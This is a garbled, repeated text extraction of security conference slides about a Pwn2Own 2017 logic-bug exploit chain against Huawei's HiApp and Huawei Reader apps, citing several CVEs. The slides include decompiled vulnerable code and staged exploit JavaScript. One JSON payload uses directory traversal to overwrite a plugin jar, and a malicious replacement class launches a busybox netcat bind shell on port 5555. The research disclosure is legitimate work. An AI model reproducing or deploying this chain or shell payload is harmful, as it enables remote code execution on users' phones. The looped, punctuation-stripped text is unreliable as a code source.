v6 = v7getString(DownloadUrl)
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
43
function download_plugin()
var json =
ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180
01aaaaaPrice0
DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu
ginsDFServiceclassesjar
FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast
1amazonawscom4aaaaaa9q84q87reertw35wy5testzip
DownloadUrlhttpss3-ap-northeast-
1amazonawscomk4aaaaaaertw35wy5testzipVersion2
windowZhangYueJSdo_command(json)
Stage 3
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
File Write
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
45
public boolean onChapPack(JSONObject arg10)
boolean v0_2
try int v3 = arg10getInt(StartIndex)
int v4 = arg10getInt(EndIndex)
String v2 = arg10getString(Price)
int v1 = arg10getInt(BookId)
String v5 = arg10getString(PayURL)
String v0_1 = arg10getString(DownloadURL)
String v7 = PATHgetBookDir() + arg10getString(FileName)
if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp
DevicegetNetType() = 0xFFFFFFFF)
FILEdelete(PATHgetBookCachePathNamePostfix(v7))
FILEdelete(v7)
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
46
public static String getBookNameCheckOpenFail(String arg2)
return PATHgetOpenFailDir() + MD5getMD5(arg2)
public static String getOpenFailDir()
return PATHgetWorkDir() + booksopenfail
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
47
5457bea93d0548a4d84357308df45322 =
pluginsDFServiceclassesjar
sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435
7308df45322
sdcardHWiReaderbookspluginsDFServiceclassesjar
Huawei Reader ndash Insecure Plugin Loading
48
public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception
return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null
arg4getClassLoader())loadClass(arg6)
protected final ArrayList P()
if(pR == null)
try PlatForm v3 = new PlatForm()
Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)
+
classesjar
comzhangyueiReaderPlugServiceDocFeature)newInstance()
v2setPlatform(((IPlatform)v3))
pR = ((IPlugDFService)v2)
Huawei Reader ndash Insecure Plugin Loading
49
function download_plugin()
documentwriteln(++ Downloading replacement classesjar ++)
It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2
windowZhangYueJSdo_command(json)
Huawei Reader ndash Payload Creation
50
package comzhangyueiReaderPlugService
import androidutilLog
public class DocFeature
public DocFeature()
comzhangyueiReaderPlugServiceDocFeature
Loge(ATTACKERRUNNING ARBITRARY CODE)
String cmd = datadatacomhuaweihwireaderbusybox
nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh
try
RuntimegetRuntime()exec(cmd)
catch (IOException e)
eprintStackTrace()
Demo
51
Questions
52
Credits
bull Georgi Geshev Rob Miller -
httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-
chrome-on-androidnew-blog-post
53
Whitepaper
54
bull Full whitepaper can be found on the MWR Labs website
(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)
PUBLIC
![Page 4: Hacktivity 2018 - F-Secure Labs · Huawei phone switches apps twice. •Often requires a deeper understanding of the application •Automated detection is harder –how do you fuzz](https://reader034.fdocuments.in/reader034/viewer/2022042112/5e8ddbec58add17b881e4a8c/html5/thumbnails/4.jpg)
About us
bull James Loureiro (NerdKernel) ndash Head of Security Research MWR primarily
focused on VR and reverse engineering (as well as herding other researchers)
bull Alex Plaskett (alexjplaskett) ndash Offensive security researcher MWR
primarily doing VR (WP7 jailbreak Pwn2Own Safari 2018 mobile security)
3
Background
bull How hard can it be
4
PWN2OWN 2017
5
Huawei Mate 9 Pro
6
PWN2OWN
Execute arbitrary instructionshellip
hellipretrieve sensitive informationhellip
hellipa full sandbox escape is requiredhellip
hellipwithout any user interaction
8
Pwn2Own Categories and Choice
9
PWN2OWN ndash Results
10
PUBLIC
Bug Hunting Approach
Browser attack surface
12
Exploit Mitigation Advancement
bull Memory Safety Mitigations
ndash ASLR PIE RELTO PartitionAlloc
bull Means you need mitigation bypass vulnerabilities too
bull Time consuming debugging memory corruption exploits on a real device
13
Attackers - Positives of Logic Bug Chains
bull Often design issues
ndash Hard to fix (long bug lives)
ndash Increased reliability
bull Architectural agnostic
ndash No problems with shellcode
bull Android IPC specifically is complex as hell
bull Harder to detect
14
Attackers - Negatives of Logic Bug Chains
bull They can get ridiculously long (11 Bugs in S8)
ndash One bug gets fixed and the whole chain is screwed
ndash Usually not particularly stealthy
Samsung phone rebooted
Huawei phone switches apps twice
bull Often requires a deeper understanding of the application
bull Automated detection is harder ndash how do you fuzz for logic bugs
15
Bug Hunting Tips
bull How too prioritise
ndash External Attack Surface (Reachable from browser)
ndash Permissions
Less of an issue for initial foothold
ndash Dangerous words
16
bull Want to rapidly find high risk issues in a large amount of apps
PUBLIC
Tooling and Automation
Toolset (Static vs Dynamic)
bull Android What do we care about
ndash BROWSABLE intents (Need to be web accessible) and Intents
ndash Content we can load into the applications (either via a WebView or Media)
ndash Controlled file writes reads
ndash Unsafe class loading
18
Increasing the attack surface
How do we get more things accessible
bull Intent Proxy Bugs
bull MITM stuff (SSL weaknesses)
19
Intent Proxy Example
bull Android Vendingbull LaunchUrlHandlerActivity
bull We control the package name and URIfinal Intent a(Intent arg17 b arg18 j arg19)
Intent v2_1Uri v7 = arg17getData()String v8 = v7getQueryParameter(url)String v10 = v7getQueryParameter(id)
hellipif((v5) ampamp (v12))
v2_1 = new Intent(androidintentactionVIEW)v2_1setData(Uriparse(v8))v2_1setPackage(v10)return v2_1
hellip
Toolset (Static Analysis)
bull Rezord (internal) ndash Mass de-compilation of all apps
bull JEB
bull Grep
21
lsquoJandroidrsquo ndash Static analysis
22
lsquoJandroidrsquo ndash Static analysis
23
lsquoJandroidrsquo ndash Static analysis
bull For more info see Chainspotting Building Exploit Chains with Logic Bugs
slides
httpsinfiltrateconcomarchives[Infiltrate]20Geshev20and20Miller20
-20Logic20Bug20Hunting20in20Chrome20on20Androidpdf
24
Dynamic Analysis Toolset
Global Hook Flexible Requires Root Lightweight
Xposed
Frida
bull Xposedbull Early injection (Zygote)
bull Global hooks across multiple applications
bull Fridabull Quick and easy prototyping
bull Debugging and dynamic analysis of obfuscated code
PUBLIC
Vulnerabilities
Building an Exploit Chain
bull So what do we need to dobull Assuming no memory corruption
bull BROWSABLE Intent URI handler etc
Browse to Website on
Device
Code Exec and Profit
HiApp ndash Huawei Market Place (App Gallery)
29
HiApp ndash Whitelist Bypass (CVE-2018-7931)
30
ltactivity androidconfigChanges=orientation|screenSize
androidlaunchMode=singleTopldquo
androidname=comhuaweiappmarketserviceexternalapiviewThirdApiActi
vity androidtheme=styleloading_activity_stylegt
ltintent-filtergt
ltaction androidname=androidintentactionVIEW gt
ltcategory androidname=androidintentcategoryDEFAULT gt
ltcategory androidname=androidintentcategoryBROWSABLE gt
ltdata androidhost=details androidscheme=appmarket gt
ltdata androidhost=search androidscheme=market gt
ltdata androidhost=avmallcom androidscheme=https gt
ltdata androidhost=comhuaweiappmarket androidscheme=hiapp gtltintent-filtergt
HiApp ndash Whitelist Bypass (CVE-2018-7931)
31
public List b()
if(ba(thisa))
thisa = new ArrayList()
thisaclear()
thisaadd(hicloudcom$)
thisaadd(vmallcom$)
thisaadd(huaweicom$)
Iterator v1 = comhuaweiappmarketservicewhitelistba()iterator()
do If(v1hasNext()) if(v1next()booleanValue()) continue
HiApp ndash stage1html (CVE-2018-7931)
32
documentlocation =hiappcomhuaweiappmarketactivityName=activityUri|webviewactivityampparams=params [ name uri type String value internal_webview name url type String value httpwwwvmallcom8000stage2html ] ampchannelId=1
Stage 1
Browse to Website on
Device
BROWSABLE Intent-
WebView
Code Exec and Profit
HiApp ndash JavaScript Bridge (CVE-2018-7932)
34
thiswebviewgetSettings()setJavaScriptEnabled(true)
thiswebviewrequestFocus()
thiswebviewsetWebViewClient(new InternalWebViewClient(this))
thiswebviewsetWebChromeClient(new
MarketWebChromeClient(this))
thiswebviewgetSettings()setBlockNetworkImage(true)
thiswebviewaddJavascriptInterface(new
HiSpaceObject(thismContext ((JsCallBackOjbect)this) thiswebview) HiSpaceObject)
HiApp ndash JavaScript Bridge (CVE-2018-7932)
35
JavascriptInterface public void launchApp(String arg7 String
arg8)
URISyntaxException v1_1
v0_1 = IntentparseUri(arg8 0)
try v0_1setPackage(arg7)
thismActivitystartActivity(v0_1)
android-app URI Schema
36
httpandroidxrefcom800_r4xrefframeworksbasecorejavaandroidco
ntentIntentjava
android-apppackage_id[scheme[host[path]]][Intent]
android-
appcomexampleappIntentaction=comexampleMY_ACTIONisome_int=
100Ssome_str=helloend
Action comexampleMY_ACTION
Package comexampleapp
Extras some_int=(int)100 some_str=(String)hello
HiApp ndash stage2html (CVE-2018-7932)
37
var pkg = comhuaweihwireader
var uri =
androidapphttpwwwgooglecoukIntentcomponent=comh
uaweihwireadercomzhangyueiReaderonlineuiActivityWeba
ction=comhuaweihwireaderSHOW_DETAILSurl=http192
16813718000stage3htmlend
windowHiSpaceObjectlaunchApp(pkguri)
Stage 2
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
Huawei Reader Application
39
Huawei Reader ndash Input Validation (CVE-2017-15308)
40
protected void onCreate(Bundle arg8)
CharSequence v0_1
String v0
CharSequence v1 = null
superonCreate(arg8)
Intent v2 = thisgetIntent()
if(v2 = null) Uri v3 = v2getData()
if(v3 = null) v0 = v3getScheme()
else v0_1 = v1
v0 = v2getStringExtra(url)
if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)
Huawei Reader ndash Input Validation (CVE-2017-15308)
41
JavascriptInterface public void do_command(String arg9)
String v4 = ((JSONObject)v2_3)getString(Action)
LOGI(js actionName + v4)
JSONObject v5 =
((JSONObject)v2_3)getJSONObject(Data)
if(v4equalsIgnoreCase(onlineReader))
JSProtocolmJSBookProtocolonline(v5) return
if(v4equalsIgnoreCase(readNow))
JSProtocolmJSBookProtocolreadNow(v5) return
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
42
public void originalDownload(JSONObject arg19 boolean
arg20 boolean arg21)
v8 = 0
v10 = v4
v4_1 = 0
try
int v13 = v7getInt(Type)
v14 = v7optInt(Version)
v15 = v7optBoolean(getDrmAuth true)
v3 = PATHgetBookDir() + v7getString(FileName)
v2 = v7getInt(FileId)
v6 = v7getString(DownloadUrl)
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
43
function download_plugin()
var json =
ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180
01aaaaaPrice0
DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu
ginsDFServiceclassesjar
FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast
1amazonawscom4aaaaaa9q84q87reertw35wy5testzip
DownloadUrlhttpss3-ap-northeast-
1amazonawscomk4aaaaaaertw35wy5testzipVersion2
windowZhangYueJSdo_command(json)
Stage 3
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
File Write
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
45
public boolean onChapPack(JSONObject arg10)
boolean v0_2
try int v3 = arg10getInt(StartIndex)
int v4 = arg10getInt(EndIndex)
String v2 = arg10getString(Price)
int v1 = arg10getInt(BookId)
String v5 = arg10getString(PayURL)
String v0_1 = arg10getString(DownloadURL)
String v7 = PATHgetBookDir() + arg10getString(FileName)
if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp
DevicegetNetType() = 0xFFFFFFFF)
FILEdelete(PATHgetBookCachePathNamePostfix(v7))
FILEdelete(v7)
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
46
public static String getBookNameCheckOpenFail(String arg2)
return PATHgetOpenFailDir() + MD5getMD5(arg2)
public static String getOpenFailDir()
return PATHgetWorkDir() + booksopenfail
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
47
5457bea93d0548a4d84357308df45322 =
pluginsDFServiceclassesjar
sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435
7308df45322
sdcardHWiReaderbookspluginsDFServiceclassesjar
Huawei Reader ndash Insecure Plugin Loading
48
public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception
return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null
arg4getClassLoader())loadClass(arg6)
protected final ArrayList P()
if(pR == null)
try PlatForm v3 = new PlatForm()
Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)
+
classesjar
comzhangyueiReaderPlugServiceDocFeature)newInstance()
v2setPlatform(((IPlatform)v3))
pR = ((IPlugDFService)v2)
Huawei Reader ndash Insecure Plugin Loading
49
function download_plugin()
documentwriteln(++ Downloading replacement classesjar ++)
It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2
windowZhangYueJSdo_command(json)
Huawei Reader ndash Payload Creation
50
package comzhangyueiReaderPlugService
import androidutilLog
public class DocFeature
public DocFeature()
comzhangyueiReaderPlugServiceDocFeature
Loge(ATTACKERRUNNING ARBITRARY CODE)
String cmd = datadatacomhuaweihwireaderbusybox
nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh
try
RuntimegetRuntime()exec(cmd)
catch (IOException e)
eprintStackTrace()
Demo
51
Questions
52
Credits
bull Georgi Geshev Rob Miller -
httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-
chrome-on-androidnew-blog-post
53
Whitepaper
54
bull Full whitepaper can be found on the MWR Labs website
(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)
PUBLIC
![Page 5: Hacktivity 2018 - F-Secure Labs · Huawei phone switches apps twice. •Often requires a deeper understanding of the application •Automated detection is harder –how do you fuzz](https://reader034.fdocuments.in/reader034/viewer/2022042112/5e8ddbec58add17b881e4a8c/html5/thumbnails/5.jpg)
Background
bull How hard can it be
4
PWN2OWN 2017
5
Huawei Mate 9 Pro
6
PWN2OWN
Execute arbitrary instructionshellip
hellipretrieve sensitive informationhellip
hellipa full sandbox escape is requiredhellip
hellipwithout any user interaction
8
Pwn2Own Categories and Choice
9
PWN2OWN ndash Results
10
PUBLIC
Bug Hunting Approach
Browser attack surface
12
Exploit Mitigation Advancement
bull Memory Safety Mitigations
ndash ASLR PIE RELTO PartitionAlloc
bull Means you need mitigation bypass vulnerabilities too
bull Time consuming debugging memory corruption exploits on a real device
13
Attackers - Positives of Logic Bug Chains
bull Often design issues
ndash Hard to fix (long bug lives)
ndash Increased reliability
bull Architectural agnostic
ndash No problems with shellcode
bull Android IPC specifically is complex as hell
bull Harder to detect
14
Attackers - Negatives of Logic Bug Chains
bull They can get ridiculously long (11 Bugs in S8)
ndash One bug gets fixed and the whole chain is screwed
ndash Usually not particularly stealthy
Samsung phone rebooted
Huawei phone switches apps twice
bull Often requires a deeper understanding of the application
bull Automated detection is harder ndash how do you fuzz for logic bugs
15
Bug Hunting Tips
bull How too prioritise
ndash External Attack Surface (Reachable from browser)
ndash Permissions
Less of an issue for initial foothold
ndash Dangerous words
16
bull Want to rapidly find high risk issues in a large amount of apps
PUBLIC
Tooling and Automation
Toolset (Static vs Dynamic)
bull Android What do we care about
ndash BROWSABLE intents (Need to be web accessible) and Intents
ndash Content we can load into the applications (either via a WebView or Media)
ndash Controlled file writes reads
ndash Unsafe class loading
18
Increasing the attack surface
How do we get more things accessible
bull Intent Proxy Bugs
bull MITM stuff (SSL weaknesses)
19
Intent Proxy Example
bull Android Vendingbull LaunchUrlHandlerActivity
bull We control the package name and URIfinal Intent a(Intent arg17 b arg18 j arg19)
Intent v2_1Uri v7 = arg17getData()String v8 = v7getQueryParameter(url)String v10 = v7getQueryParameter(id)
hellipif((v5) ampamp (v12))
v2_1 = new Intent(androidintentactionVIEW)v2_1setData(Uriparse(v8))v2_1setPackage(v10)return v2_1
hellip
Toolset (Static Analysis)
bull Rezord (internal) ndash Mass de-compilation of all apps
bull JEB
bull Grep
21
lsquoJandroidrsquo ndash Static analysis
22
lsquoJandroidrsquo ndash Static analysis
23
lsquoJandroidrsquo ndash Static analysis
bull For more info see Chainspotting Building Exploit Chains with Logic Bugs
slides
httpsinfiltrateconcomarchives[Infiltrate]20Geshev20and20Miller20
-20Logic20Bug20Hunting20in20Chrome20on20Androidpdf
24
Dynamic Analysis Toolset
Global Hook Flexible Requires Root Lightweight
Xposed
Frida
bull Xposedbull Early injection (Zygote)
bull Global hooks across multiple applications
bull Fridabull Quick and easy prototyping
bull Debugging and dynamic analysis of obfuscated code
PUBLIC
Vulnerabilities
Building an Exploit Chain
bull So what do we need to dobull Assuming no memory corruption
bull BROWSABLE Intent URI handler etc
Browse to Website on
Device
Code Exec and Profit
HiApp ndash Huawei Market Place (App Gallery)
29
HiApp ndash Whitelist Bypass (CVE-2018-7931)
30
ltactivity androidconfigChanges=orientation|screenSize
androidlaunchMode=singleTopldquo
androidname=comhuaweiappmarketserviceexternalapiviewThirdApiActi
vity androidtheme=styleloading_activity_stylegt
ltintent-filtergt
ltaction androidname=androidintentactionVIEW gt
ltcategory androidname=androidintentcategoryDEFAULT gt
ltcategory androidname=androidintentcategoryBROWSABLE gt
ltdata androidhost=details androidscheme=appmarket gt
ltdata androidhost=search androidscheme=market gt
ltdata androidhost=avmallcom androidscheme=https gt
ltdata androidhost=comhuaweiappmarket androidscheme=hiapp gtltintent-filtergt
HiApp ndash Whitelist Bypass (CVE-2018-7931)
31
public List b()
if(ba(thisa))
thisa = new ArrayList()
thisaclear()
thisaadd(hicloudcom$)
thisaadd(vmallcom$)
thisaadd(huaweicom$)
Iterator v1 = comhuaweiappmarketservicewhitelistba()iterator()
do If(v1hasNext()) if(v1next()booleanValue()) continue
HiApp ndash stage1html (CVE-2018-7931)
32
documentlocation =hiappcomhuaweiappmarketactivityName=activityUri|webviewactivityampparams=params [ name uri type String value internal_webview name url type String value httpwwwvmallcom8000stage2html ] ampchannelId=1
Stage 1
Browse to Website on
Device
BROWSABLE Intent-
WebView
Code Exec and Profit
HiApp ndash JavaScript Bridge (CVE-2018-7932)
34
thiswebviewgetSettings()setJavaScriptEnabled(true)
thiswebviewrequestFocus()
thiswebviewsetWebViewClient(new InternalWebViewClient(this))
thiswebviewsetWebChromeClient(new
MarketWebChromeClient(this))
thiswebviewgetSettings()setBlockNetworkImage(true)
thiswebviewaddJavascriptInterface(new
HiSpaceObject(thismContext ((JsCallBackOjbect)this) thiswebview) HiSpaceObject)
HiApp ndash JavaScript Bridge (CVE-2018-7932)
35
JavascriptInterface public void launchApp(String arg7 String
arg8)
URISyntaxException v1_1
v0_1 = IntentparseUri(arg8 0)
try v0_1setPackage(arg7)
thismActivitystartActivity(v0_1)
android-app URI Schema
36
httpandroidxrefcom800_r4xrefframeworksbasecorejavaandroidco
ntentIntentjava
android-apppackage_id[scheme[host[path]]][Intent]
android-
appcomexampleappIntentaction=comexampleMY_ACTIONisome_int=
100Ssome_str=helloend
Action comexampleMY_ACTION
Package comexampleapp
Extras some_int=(int)100 some_str=(String)hello
HiApp ndash stage2html (CVE-2018-7932)
37
var pkg = comhuaweihwireader
var uri =
androidapphttpwwwgooglecoukIntentcomponent=comh
uaweihwireadercomzhangyueiReaderonlineuiActivityWeba
ction=comhuaweihwireaderSHOW_DETAILSurl=http192
16813718000stage3htmlend
windowHiSpaceObjectlaunchApp(pkguri)
Stage 2
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
Huawei Reader Application
39
Huawei Reader ndash Input Validation (CVE-2017-15308)
40
protected void onCreate(Bundle arg8)
CharSequence v0_1
String v0
CharSequence v1 = null
superonCreate(arg8)
Intent v2 = thisgetIntent()
if(v2 = null) Uri v3 = v2getData()
if(v3 = null) v0 = v3getScheme()
else v0_1 = v1
v0 = v2getStringExtra(url)
if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)
Huawei Reader ndash Input Validation (CVE-2017-15308)
41
JavascriptInterface public void do_command(String arg9)
String v4 = ((JSONObject)v2_3)getString(Action)
LOGI(js actionName + v4)
JSONObject v5 =
((JSONObject)v2_3)getJSONObject(Data)
if(v4equalsIgnoreCase(onlineReader))
JSProtocolmJSBookProtocolonline(v5) return
if(v4equalsIgnoreCase(readNow))
JSProtocolmJSBookProtocolreadNow(v5) return
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
42
public void originalDownload(JSONObject arg19 boolean
arg20 boolean arg21)
v8 = 0
v10 = v4
v4_1 = 0
try
int v13 = v7getInt(Type)
v14 = v7optInt(Version)
v15 = v7optBoolean(getDrmAuth true)
v3 = PATHgetBookDir() + v7getString(FileName)
v2 = v7getInt(FileId)
v6 = v7getString(DownloadUrl)
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
43
function download_plugin()
var json =
ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180
01aaaaaPrice0
DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu
ginsDFServiceclassesjar
FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast
1amazonawscom4aaaaaa9q84q87reertw35wy5testzip
DownloadUrlhttpss3-ap-northeast-
1amazonawscomk4aaaaaaertw35wy5testzipVersion2
windowZhangYueJSdo_command(json)
Stage 3
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
File Write
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
45
public boolean onChapPack(JSONObject arg10)
boolean v0_2
try int v3 = arg10getInt(StartIndex)
int v4 = arg10getInt(EndIndex)
String v2 = arg10getString(Price)
int v1 = arg10getInt(BookId)
String v5 = arg10getString(PayURL)
String v0_1 = arg10getString(DownloadURL)
String v7 = PATHgetBookDir() + arg10getString(FileName)
if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp
DevicegetNetType() = 0xFFFFFFFF)
FILEdelete(PATHgetBookCachePathNamePostfix(v7))
FILEdelete(v7)
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
46
public static String getBookNameCheckOpenFail(String arg2)
return PATHgetOpenFailDir() + MD5getMD5(arg2)
public static String getOpenFailDir()
return PATHgetWorkDir() + booksopenfail
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
47
5457bea93d0548a4d84357308df45322 =
pluginsDFServiceclassesjar
sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435
7308df45322
sdcardHWiReaderbookspluginsDFServiceclassesjar
Huawei Reader ndash Insecure Plugin Loading
48
public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception
return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null
arg4getClassLoader())loadClass(arg6)
protected final ArrayList P()
if(pR == null)
try PlatForm v3 = new PlatForm()
Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)
+
classesjar
comzhangyueiReaderPlugServiceDocFeature)newInstance()
v2setPlatform(((IPlatform)v3))
pR = ((IPlugDFService)v2)
Huawei Reader ndash Insecure Plugin Loading
49
function download_plugin()
documentwriteln(++ Downloading replacement classesjar ++)
It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2
windowZhangYueJSdo_command(json)
Huawei Reader ndash Payload Creation
50
package comzhangyueiReaderPlugService
import androidutilLog
public class DocFeature
public DocFeature()
comzhangyueiReaderPlugServiceDocFeature
Loge(ATTACKERRUNNING ARBITRARY CODE)
String cmd = datadatacomhuaweihwireaderbusybox
nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh
try
RuntimegetRuntime()exec(cmd)
catch (IOException e)
eprintStackTrace()
Demo
51
Questions
52
Credits
bull Georgi Geshev Rob Miller -
httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-
chrome-on-androidnew-blog-post
53
Whitepaper
54
bull Full whitepaper can be found on the MWR Labs website
(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)
PUBLIC
![Page 6: Hacktivity 2018 - F-Secure Labs · Huawei phone switches apps twice. •Often requires a deeper understanding of the application •Automated detection is harder –how do you fuzz](https://reader034.fdocuments.in/reader034/viewer/2022042112/5e8ddbec58add17b881e4a8c/html5/thumbnails/6.jpg)
PWN2OWN 2017
5
Huawei Mate 9 Pro
6
PWN2OWN
Execute arbitrary instructionshellip
hellipretrieve sensitive informationhellip
hellipa full sandbox escape is requiredhellip
hellipwithout any user interaction
8
Pwn2Own Categories and Choice
9
PWN2OWN ndash Results
10
PUBLIC
Bug Hunting Approach
Browser attack surface
12
Exploit Mitigation Advancement
bull Memory Safety Mitigations
ndash ASLR PIE RELTO PartitionAlloc
bull Means you need mitigation bypass vulnerabilities too
bull Time consuming debugging memory corruption exploits on a real device
13
Attackers - Positives of Logic Bug Chains
bull Often design issues
ndash Hard to fix (long bug lives)
ndash Increased reliability
bull Architectural agnostic
ndash No problems with shellcode
bull Android IPC specifically is complex as hell
bull Harder to detect
14
Attackers - Negatives of Logic Bug Chains
bull They can get ridiculously long (11 Bugs in S8)
ndash One bug gets fixed and the whole chain is screwed
ndash Usually not particularly stealthy
Samsung phone rebooted
Huawei phone switches apps twice
bull Often requires a deeper understanding of the application
bull Automated detection is harder ndash how do you fuzz for logic bugs
15
Bug Hunting Tips
bull How too prioritise
ndash External Attack Surface (Reachable from browser)
ndash Permissions
Less of an issue for initial foothold
ndash Dangerous words
16
bull Want to rapidly find high risk issues in a large amount of apps
PUBLIC
Tooling and Automation
Toolset (Static vs Dynamic)
bull Android What do we care about
ndash BROWSABLE intents (Need to be web accessible) and Intents
ndash Content we can load into the applications (either via a WebView or Media)
ndash Controlled file writes reads
ndash Unsafe class loading
18
Increasing the attack surface
How do we get more things accessible
bull Intent Proxy Bugs
bull MITM stuff (SSL weaknesses)
19
Intent Proxy Example
bull Android Vendingbull LaunchUrlHandlerActivity
bull We control the package name and URIfinal Intent a(Intent arg17 b arg18 j arg19)
Intent v2_1Uri v7 = arg17getData()String v8 = v7getQueryParameter(url)String v10 = v7getQueryParameter(id)
hellipif((v5) ampamp (v12))
v2_1 = new Intent(androidintentactionVIEW)v2_1setData(Uriparse(v8))v2_1setPackage(v10)return v2_1
hellip
Toolset (Static Analysis)
bull Rezord (internal) ndash Mass de-compilation of all apps
bull JEB
bull Grep
21
lsquoJandroidrsquo ndash Static analysis
22
lsquoJandroidrsquo ndash Static analysis
23
lsquoJandroidrsquo ndash Static analysis
bull For more info see Chainspotting Building Exploit Chains with Logic Bugs
slides
httpsinfiltrateconcomarchives[Infiltrate]20Geshev20and20Miller20
-20Logic20Bug20Hunting20in20Chrome20on20Androidpdf
24
Dynamic Analysis Toolset
Global Hook Flexible Requires Root Lightweight
Xposed
Frida
bull Xposedbull Early injection (Zygote)
bull Global hooks across multiple applications
bull Fridabull Quick and easy prototyping
bull Debugging and dynamic analysis of obfuscated code
PUBLIC
Vulnerabilities
Building an Exploit Chain
bull So what do we need to dobull Assuming no memory corruption
bull BROWSABLE Intent URI handler etc
Browse to Website on
Device
Code Exec and Profit
HiApp ndash Huawei Market Place (App Gallery)
29
HiApp ndash Whitelist Bypass (CVE-2018-7931)
30
ltactivity androidconfigChanges=orientation|screenSize
androidlaunchMode=singleTopldquo
androidname=comhuaweiappmarketserviceexternalapiviewThirdApiActi
vity androidtheme=styleloading_activity_stylegt
ltintent-filtergt
ltaction androidname=androidintentactionVIEW gt
ltcategory androidname=androidintentcategoryDEFAULT gt
ltcategory androidname=androidintentcategoryBROWSABLE gt
ltdata androidhost=details androidscheme=appmarket gt
ltdata androidhost=search androidscheme=market gt
ltdata androidhost=avmallcom androidscheme=https gt
ltdata androidhost=comhuaweiappmarket androidscheme=hiapp gtltintent-filtergt
HiApp ndash Whitelist Bypass (CVE-2018-7931)
31
public List b()
if(ba(thisa))
thisa = new ArrayList()
thisaclear()
thisaadd(hicloudcom$)
thisaadd(vmallcom$)
thisaadd(huaweicom$)
Iterator v1 = comhuaweiappmarketservicewhitelistba()iterator()
do If(v1hasNext()) if(v1next()booleanValue()) continue
HiApp ndash stage1html (CVE-2018-7931)
32
documentlocation =hiappcomhuaweiappmarketactivityName=activityUri|webviewactivityampparams=params [ name uri type String value internal_webview name url type String value httpwwwvmallcom8000stage2html ] ampchannelId=1
Stage 1
Browse to Website on
Device
BROWSABLE Intent-
WebView
Code Exec and Profit
HiApp ndash JavaScript Bridge (CVE-2018-7932)
34
thiswebviewgetSettings()setJavaScriptEnabled(true)
thiswebviewrequestFocus()
thiswebviewsetWebViewClient(new InternalWebViewClient(this))
thiswebviewsetWebChromeClient(new
MarketWebChromeClient(this))
thiswebviewgetSettings()setBlockNetworkImage(true)
thiswebviewaddJavascriptInterface(new
